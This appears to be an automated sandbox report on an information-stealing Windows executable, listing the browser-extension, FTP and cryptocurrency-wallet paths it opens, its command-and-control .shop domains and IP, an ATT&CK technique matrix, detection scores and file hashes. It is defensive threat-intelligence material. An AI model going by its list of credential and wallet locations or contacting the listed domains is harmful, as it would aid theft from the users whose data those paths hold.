                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                    Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.100000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.34f9550.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.34f9550.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    23
                    Virtualization/Sandbox Evasion
                    2
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services1
                    Screen Capture
                    21
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    2
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                    Process Injection
                    Security Account Manager23
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares31
                    Data from Local System
                    113
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model2
                    Clipboard Data
                    Protocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Software Packing
                    Cached Domain Credentials22
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe39%ReversingLabsWin32.Trojan.Nekark
                    file.exe44%VirustotalBrowse
                    file.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://tirepublicerj.shop:443/apiCLSID100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/)100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/ndows100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/api100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/9100%Avira URL Cloudmalware
                    https://tirepublicerj.shop/api8100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    tirepublicerj.shop
                    104.21.64.1
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          https://tirepublicerj.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          nearycrepso.shopfalse
                            high
                            rabidcowse.shopfalse
                              high
                              wholersorie.shopfalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://tirepublicerj.shop/9file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://ocsp.entrust.net03file.exefalse
                                        high
                                        http://ocsp.entrust.net02file.exefalse
                                          high
                                          http://www.entrust.net/rpa03file.exefalse
                                            high
                                            http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                                              high
                                              http://upx.sf.netAmcache.hve.5.drfalse
                                                high
                                                https://tirepublicerj.shop:443/apiCLSIDfile.exe, 00000002.00000002.1878711714.00000000011D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://tirepublicerj.shop/file.exe, 00000002.00000002.1879224589.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878661592.00000000011BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://tirepublicerj.shop/)file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://crl.entrust.net/ts1ca.crl0file.exefalse
                                                  high
                                                  https://tirepublicerj.shop/ndowsfile.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://crl.entrust.net/2048ca.crl0file.exefalse
                                                    high
                                                    https://www.entrust.net/rpa0file.exefalse
                                                      high
                                                      https://tirepublicerj.shop/api8file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.21.64.1
                                                      tirepublicerj.shopUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1584228
                                                      Start date and time:2025-01-04 22:57:05 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 54s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:file.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@5/5@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 37
                                                      • Number of non-executed functions: 104
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.136, 172.202.163.200, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      16:58:07API Interceptor7x Sleep call for process: file.exe modified
                                                      16:58:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.21.64.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                      • adsfirm.com/administrator/index.php
                                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                                      • www.bser101pp.buzz/v89f/
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSJ18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.56.70
                                                      SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.80.1
                                                      ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.112.1
                                                      rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.96.1
                                                      HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 104.21.38.84
                                                      9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.137.232
                                                      riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.138.232
                                                      9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                      • 188.114.96.3
                                                      http://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                      • 172.67.166.199
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      a0e9f5d64349fb13191bc781f81f42e1J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      random.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.64.1
                                                      random.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.64.1
                                                      No context
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8843944994528008
                                                      Encrypted:false
                                                      SSDEEP:192:Pg6BuZv5PxA0LR3VIxaGGzuiFcyZ24IO8yB:YoG55bLR38aHzuiFcyY4IO8i
                                                      MD5:5E97E250F5B90218E5B1E749CA569A92
                                                      SHA1:CD77A9BD82EBEB5D9D270499B547CA7D8C53034B
                                                      SHA-256:3D7F83E3EBBF79708A521F35782AA8481489DD84689C824127FB1F0B755CF689
                                                      SHA-512:627EB8C36F475229B37A79BD05ACC7D5AE2C137DAA5B6D3089C9DE06C33EF2A5CDC1172651F2E1AEFF39F56AC1644BB85E4E480B3BD8B91B4432175A89C81C48
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.0.1.4.8.6.7.2.8.8.7.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.0.1.4.8.7.2.2.8.8.7.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.b.9.d.2.f.3.-.f.8.f.e.-.4.5.7.6.-.8.0.a.c.-.9.7.e.f.b.6.4.f.4.3.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.e.c.9.7.5.f.-.6.3.a.9.-.4.5.2.7.-.9.a.7.3.-.3.9.9.7.6.9.6.7.c.8.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.6.0.-.0.0.0.1.-.0.0.1.4.-.5.7.9.c.-.e.7.b.b.f.3.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.6.d.c.c.7.a.7.7.1.c.7.a.d.f.1.6.1.d.d.d.0.f.4.8.b.6.b.5.b.5.f.2.2.b.f.d.a.!.f.i.l.e...e.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Sat Jan 4 21:58:06 2025, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):153012
                                                      Entropy (8bit):3.7291700678866038
                                                      Encrypted:false
                                                      SSDEEP:1536:aKqs1UuBojR+pN4uE2aOuKLTgNAR7ZMtT1tbsCDNcOoOV4Z:5qs1wI4uEq/LTgkwBB/oOV4
                                                      MD5:21329B7956618E4D438785662BBE53DE
                                                      SHA1:74CE125156EB344DC44CD160AB9B6876E5AF53EE
                                                      SHA-256:CA214AFD35711718C699DDC92468C999E4ECD692BE3C5ACF5B8DB3755A67815F
                                                      SHA-512:B0910FDDD5113F345BF3E63ECB50C390A8B29BA284A1DCE22BD5689CC64FD7E350A1F5AE9077E4FD5ED4E7BFD15C7A79FB7EFF94E993D99AC94BC778FAD5EE1D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:MDMP..a..... ........yg....................................$................/..........`.......8...........T............$...1......................................................................................................eJ......P.......GenuineIntel............T.......`....yg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8356
                                                      Entropy (8bit):3.688024919952929
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJ3CjH6c6Y9QSUTnYgmf6VVJ3prj89bnbZsfstjm:R6lXJEH6c6YKSUTnYgmf8VJunbyfK6
                                                      MD5:698564804E7E81093D9A200E16830F0F
                                                      SHA1:37DC11F0AC2C373FF86E37CF512DDFE9D25BD9F8
                                                      SHA-256:F8B520C6A974E0790ABFF8380A97AF0B9A78FF6A5B036E22F12B1F3B18614B76
                                                      SHA-512:08324641798F5428A2FED0B524B1877684D66F68968BCD6CEA20AB62691EFC004B1FD737A6DA116B684489558EEB4B9DC0AF4EBAA3BCA26F1B24F030EEE1622A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.9.6.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4720
                                                      Entropy (8bit):4.428868521094459
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsmhJg77aI9yVWpW8VYtYm8M4JtR0dxPcf6FKo+q8vER0dxPcfvQQlBFd:uIjfII74k7V1JtRlf+KERlfoQlBFd
                                                      MD5:67429910F17DDF9E51B49593A26D3E89
                                                      SHA1:1A288451ED25FB441BB0DCB47B2B590094931396
                                                      SHA-256:85BF9A26425C710F1BA3D6FCACCC258669EE8BD95865BC506B55FB90FAD49FEC
                                                      SHA-512:3CC696675BA03076F3DFD4BAD7B72F149075B7B4C28B5308824FC51994AC90AA90D33FA5B24D240904E60611A9F88145FF1F636D33F383EFBFC09FA4B12E7F3A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661740" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.4655873110375905
                                                      Encrypted:false
                                                      SSDEEP:6144:eIXfpi67eLPU9skLmb0b40WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb1m:zXD940WlLZMM6YFH1+1m
                                                      MD5:68966FD0980199EFDFE1999D24E4786B
                                                      SHA1:C5953B62EA8E5B1DCBE8CB8C52F9D37660A623B1
                                                      SHA-256:C856470B5EE731A2AE84BE6FBDEC705B0C0F66D94103A0ED86DC0BCEE0AF4D4B
                                                      SHA-512:A5698EF42A51C4091A1F2E01503057512DF5E4D280C4BD8E8F71DBDCB6A2178E783A8AA61815E6E91AEF7F2EB43223091F767ED8FA7E2E0B27F4744A6CD53BFD
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..F..^................................................................................................................................................................................................................................................................................................................................................Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.898283829047742
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:file.exe
                                                      File size:390'696 bytes
                                                      MD5:e9f13d0b330a73ece569b6115d2ac4f0
                                                      SHA1:ae46dcc7a771c7adf161ddd0f48b6b5b5f22bfda
                                                      SHA256:9c4afe3e68312e44bbaa3f122a251bb087f72d94adf8d432bdd8382087086c92
                                                      SHA512:d1281ae02e0430d01339213c737c3aec2675b6a6983d6da170bc0afcaee1b70a89b654baa250d7e69211219f315a28ec22b5f7faa1ea5382144e7a85630bc267
                                                      SSDEEP:6144:72pwktDrDuMt4Bgj04zLS/70E7IodJ6vsVzsooEAPmIV49g2/GzrtXAlGSIxj76o:L4Cj45zA7Fv6vsVOzm9t/Gzr9AsVP6Qt
                                                      TLSH:CA8402092BC48320C5D4263291E34D211FE6B6576AF3EA89BDC545EB0A46FE05E4BBDC
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0.................. ........@.. .......................@............`................................
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x40dade
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows cui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
                                                      TLS Callbacks:
